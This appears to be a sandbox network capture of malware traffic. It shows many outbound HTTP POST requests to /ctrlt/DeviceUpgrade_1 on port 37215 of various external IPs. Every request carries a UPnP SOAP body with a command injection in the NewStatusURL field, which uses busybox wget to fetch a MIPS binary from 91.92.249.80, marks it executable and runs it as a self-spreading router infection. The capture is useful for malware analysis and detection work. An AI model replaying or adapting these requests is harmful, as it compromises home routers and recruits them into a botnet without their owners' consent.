                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2085192.168.2.2338560197.239.75.3137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.610434055 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2086192.168.2.235685441.56.28.4637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.610480070 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2087192.168.2.234614647.140.7.17337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.610527992 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2088192.168.2.2356032102.68.244.4537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.610544920 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2089192.168.2.235094441.122.123.16837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.610965967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2090192.168.2.235622641.248.115.17637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.611790895 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2091192.168.2.2348470157.24.135.1437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.611857891 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2092192.168.2.2350916185.102.125.15637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.611885071 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2093192.168.2.234559041.180.232.17237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.611886024 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2094192.168.2.235466041.178.207.13937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.613205910 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
